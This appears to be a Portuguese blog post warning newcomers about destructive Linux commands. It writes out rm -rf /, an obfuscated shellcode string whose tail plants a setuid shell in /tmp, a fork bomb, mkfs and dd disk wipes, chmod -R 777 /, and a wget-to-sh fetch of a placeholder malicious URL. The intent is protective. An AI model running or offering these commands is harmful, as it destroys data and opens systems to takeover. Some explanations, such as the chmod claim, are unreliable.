Para quem usa linux cuidado


Descobri o que não deve ser nenhuma novidade para alguns codifgos mortais do linux vejam:


rm -rf /

Este comando eliminará toda a informação do directório Root.

- char esp[] __attribute__ ((section(”.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
“\x6e\x2f\x73\x68\x00\x2d\x63\x00″
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;

Este comando faz precisamente o mesmo do primeiro, a única diferença consiste no facto de ser mais discreto. Mesmo os utilizadores mais habituados ao sistema Linux, podem não reconhecer o comando.

- mkfs.ext3 /dev/das

Este comando irá eliminar ou reformatar toda a informação existente no dispositivo indicado após o comando mkfs.

- :(){ :|:& };:

Este comando leva o sistema ao limite. Mais conhecido por “forkbomb” este comando indica ao sistema que efectue o maior número de processos até que o sistema crash. Além de todos os constrangimentos causados por este comando, pode também causar danos ao corromper a informação.

- chmod -R 777 /

Este comando permite a um outro utilizador ter privilégios de ler, escrever e executar (“Read, Write, Execute”). Os únicos ficheiros que “escapam” a este comando, são os ficheiros “/bin” e “/etc/bin” pois encontram-se em processamento.

- wget http://codigomalicioso -O- | sh

Este comando faz com que o sistema efectue um download de um código malicioso e o instale na sua máquina. Como é fácil de prever, tudo será possível acontecer a partir desse momento.

O último comando é o mais destrutivo de todos, pois faz com que o disco seja formatado e fique tal e qual como vem de fábrica.

- dd if=/dev/zero of=/dev/sda

Espero que com este artigo os menos experientes ou conhecedores dos sistemas Linux fiquem mais protegidos contra ataques. Por isso tenham cuidado ao executar este codigos.

0 comentários: